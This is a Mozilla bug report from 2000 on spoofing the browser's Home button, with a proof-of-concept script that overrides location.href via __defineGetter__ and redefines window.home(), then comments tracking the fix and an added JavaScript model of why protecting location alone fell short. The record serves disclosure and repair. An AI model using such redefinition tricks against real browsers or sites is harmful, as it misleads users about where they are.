spoofing user's "Home"

VERIFIED FIXED in mozilla0.9.1

Status: VERIFIED FIXED
Priority: P2
Severity: normal
Reported: 19 years ago
Last modified: 17 years ago

People

(Reporter: security-bugs, Assigned: security-bugs)

Tracking

Version: Trunk
Target Milestone: mozilla0.9.1
Points: ---

Firefox Tracking Flags

(Not tracked)

Details

(Whiteboard: [need reviews])

Attachments

(1 attachment)

Date: Mon, 26 Jun 2000 16:48:03 +0300
From: Georgi Guninski <joro@nat.bg>
To: Mitchell Stoltz <mstoltz@netscape.com>

It is possible to change the behavior of clicking the "Home" button or
choosing "Go|Home" from the menu.
The exploit uses __defineGetter__ and redefinition of window.home().
I think that allowing redefinition of predefined functions is not a good
idea.

The code is:
---------------------------------------
Press the "Home" button or choose "Go|Home" in the other window in 2
seconds.
<SCRIPT>
a=window.open("about:blank","a");
function f()
{
  // replace the getter for location.href in the opened window
  a.location.__defineGetter__("href",function() {return "http://www.yahoo.com"});
  // replace the built-in window.home() with page-supplied code
  a.window.home=new Function("this.document.body.innerHTML='Spoofed'");
  a.window.home();
}
setTimeout("f()",2000);
</SCRIPT>
---------------------------------------
(Assignee)

Comment 1

19 years ago
This testcase does not behave as described, but the vulnerabilities mentioned
should be addressed.
(Assignee)

Updated

19 years ago
Status: NEW → ASSIGNED
(Assignee)

Comment 2

19 years ago
Can't duplicate this exploit, marking M18 for post-Beta2. Re-address this exploit 
and look at the issue of redefining properties.
Target Milestone: --- → M18
(Assignee)

Comment 3

18 years ago
Fixing 36946 by marking key properties as PERMANENT will fix this too. As for 
__defineGetter__, this should be fixed now, I think.
Depends on: 36946
(Assignee)

Comment 4

18 years ago
I think this no longer works, marking nsbeta3 to remind myself to look at it.
Keywords: nsbeta3
Priority: P3 → P2
(Assignee)

Comment 5

18 years ago
Nominating for RTM, and I have opened bug 54976 on the __defineGetter__ aspect
of this bug. Patrick, can you give me a + ?
Keywords: rtm
(Assignee)

Comment 6

18 years ago
Created attachment 17287 [details] [diff] [review]
jst's patch - makes location permanent
(Assignee)

Comment 7

18 years ago
I've posted jst's patch which adds JSPROP_PERMANENT to the location property.
This doesn't completely fix the problem. Looks like we have to protect
location.href as well. 

Comment 8

18 years ago
Mitch, are you happy with the patch in this bug?  Can it go to reviews?  (Is it
OK to strcmp against "LOCATION" vs "location" or using strcasecmp?)  The fix is
reasonably small.  If you think it's correct, it _might_ get approved for RTM...
Whiteboard: [need reviews]
(Assignee)

Comment 9

18 years ago
This patch is not a complete fix. We need to restrict "location.href" as well.
I'll see about getting this done.
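
As an added illustration of the point comments 7 and 9 make (this is not code from the bug report, from jst's patch, or from Mozilla), the following plain-JavaScript model shows why making `location` permanent alone is not enough. A non-configurable, non-writable property defined with `Object.defineProperty` is the modern analogue of JSPROP_PERMANENT; until the `href` property on the location object gets the same treatment, the testcase's `__defineGetter__` trick still replaces what a script observes. The `makeWindow` object, `tryHijack`, `evaluateFixes` and the URLs are constructed for this example and do not model a real browser's window object.

```javascript
// Added example, not part of the bug or Mozilla's fix: a window-like object
// built by hand so that the three stages of the fix can be compared offline.

// Attempt to redefine `prop` on `obj` the way the testcase does
// (__defineGetter__) and then by plain assignment. Returns true if the value
// a script reads afterwards differs from the value it read before.
function tryHijack(obj, prop, spoofed) {
  const before = obj[prop];
  try {
    obj.__defineGetter__(prop, function () { return spoofed; });
  } catch (e) {
    // Non-configurable property: __defineGetter__ throws a TypeError.
  }
  try {
    obj[prop] = spoofed;
  } catch (e) {
    // Non-writable property: assignment throws in strict mode and is
    // silently ignored in sloppy mode; either way the value is unchanged.
  }
  return obj[prop] !== before;
}

// Build a constructed window-like object. `permanentLocation` mirrors jst's
// patch (JSPROP_PERMANENT on `location`); `permanentHref` mirrors the
// follow-up that comment 9 asks for (protecting `location.href` as well).
function makeWindow({ permanentLocation, permanentHref }) {
  const win = {};
  const location = {};
  Object.defineProperty(location, 'href', {
    value: 'http://home.example/', // constructed home URL
    writable: !permanentHref,
    configurable: !permanentHref,
    enumerable: true,
  });
  Object.defineProperty(win, 'location', {
    value: location,
    writable: !permanentLocation,
    configurable: !permanentLocation,
    enumerable: true,
  });
  return win;
}

// Run the three configurations the bug's history walks through and report
// whether `window.location` or `window.location.href` could be replaced.
function evaluateFixes() {
  const spoof = 'http://spoofed.example/'; // constructed spoof target
  const configs = {
    unpatched: { permanentLocation: false, permanentHref: false },
    locationOnly: { permanentLocation: true, permanentHref: false },
    both: { permanentLocation: true, permanentHref: true },
  };
  const results = {};
  for (const [name, cfg] of Object.entries(configs)) {
    const win = makeWindow(cfg);
    results[name] = {
      href: tryHijack(win.location, 'href', spoof),
      location: tryHijack(win, 'location', { href: spoof }),
    };
  }
  return results;
}

// Usage: prints {unpatched: {href: true, location: true},
//                locationOnly: {href: true, location: false},
//                both: {href: false, location: false}}
console.log(evaluateFixes());
```

The `locationOnly` row is the situation comment 7 describes: once `location` itself can no longer be swapped out, a script can still reach inside it and redefine `href`, so the inner property needs the same permanent flag before the spoof stops working.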

Updated

18 years ago
QA Contact: czhang → junruh
(Assignee)

Comment 10

18 years ago
Future, since the fix is not ready yet.
Target Milestone: M18 → Future
(Assignee)

Updated

18 years ago
Keywords: rtm
(Assignee)

Comment 11

18 years ago
removing rtm.

Comment 12

18 years ago
Mass changing QA to ckritzer.
QA Contact: junruh → ckritzer
(Assignee)

Comment 13

18 years ago
Mass changing milestones to Moz0.9.1. Many of these bugs are dependent on the
XPConnected DOM and its associated security UI changes.
Target Milestone: Future → mozilla0.9.1
(Assignee)

Comment 14

18 years ago
Georgi thinks this is no longer an issue. You can still redefine window.home()
but this doesn't change the behavior of the Home button anymore. There are a few
other bugs dealing with redefining built-in properties, but that's covered
elsewhere, so I'm closing this one.
Status: ASSIGNED → RESOLVED
Last Resolved: 18 years ago
Resolution: --- → FIXED

Comment 15

18 years ago
Marking VERIFIED FIXED per originator on:
-MacOS91 2001-05-21-15-trunk
-Win98SE 2001-05-22-06-trunk
-LinRH62 2001-05-22-05-trunk
Status: RESOLVED → VERIFIED
(Assignee)

Comment 16

17 years ago
Removing NS_Confidential flag.
Group: netscapeconfidential?